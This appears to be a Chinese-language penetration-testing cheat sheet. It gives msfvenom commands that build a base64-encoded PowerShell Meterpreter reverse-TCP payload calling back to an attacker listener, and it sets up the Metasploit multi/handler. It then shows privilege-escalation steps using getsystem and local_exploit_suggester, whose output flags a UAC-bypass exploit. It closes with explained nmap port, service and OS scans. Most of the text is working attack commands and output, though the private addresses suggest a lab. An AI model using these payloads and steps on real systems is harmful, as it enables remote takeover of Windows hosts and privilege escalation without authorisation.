#无文件 #PowerShell #反向木马 #ReverseShell #Metasploit #Windows #powershell #reverse #tcp #Meterpreter #渗透测试

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 -e cmd/powershell_base64 -f psh-cmd > reverse.ps1

#无文件 #PowerShell #反向木马 #ReverseShell #Metasploit #Windows #powershell #reverse #tcp #Meterpreter #渗透测试

msf6 > use exploit/multi/handler
msf6 > set payload windows/shell_reverse_tcp

> msfvenom -p windows/shell_reverse_tcp LHOST=192.168.5.229 LPORT=4444 -e cmd/powershell_base64 -f psh-cmd > reverse.ps1
1. 开启监听
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
2. 生成powershell command命令
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.229 LPORT=4444 -e cmd/powershell_base64 -f psh-cmd > reverse.ps1
3. 提权
meterpreter > getsystem #拿不到权限
meterpreter > bg

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.5.233 - Collecting local exploits for x86/windows...
[*] 192.168.5.233 - 196 exploit checks are being tried...
[+] 192.168.5.233 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
……

扫出可以提权的exploit，随便使用一个提权

使用 nmap 执行不同扫描：

1. 第一个命令：
sudo nmap --min-rate 10000 -p- 192.168.153.130
这个命令对目标 IP 地址（192.168.153.130）执行端口扫描，使用 --min-rate 10000 设置扫描速度，意味着每秒最小发送 10,000 个数据包，`-p-` 表示扫描所有端口（1-65535）。

2. 第二个命令：
sudo nmap -sT -sV -sC -O -p 22,80 192.168.153.130
这个命令执行多种扫描：
- `-sT`：使用 TCP 连接扫描（全连接扫描）。
- `-sV`：尝试识别服务版本。
- `-sC`：使用默认的脚本扫描（可以帮助发现更多信息）。
- `-O`：启用操作系统识别。
- `-p 22,80`：仅扫描端口 22 和 80。

3. 第三个命令：
sudo nmap -sU -p 22,80 192.168.153.130
这个命令执行 UDP 扫描（使用 `-sU`），对目标 IP 地址的 22 和 80 端口进行扫描。UDP 扫描通常比 TCP 扫描慢，因为 UDP 是无连接协议，且不返回 ACK 包。

这些命令适用于快速和全面的网络扫描，帮助识别目标系统上开放的端口、服务版本以及其他潜在的安全信息。
#nmap #网络扫描 #TCP扫描 #UDP扫描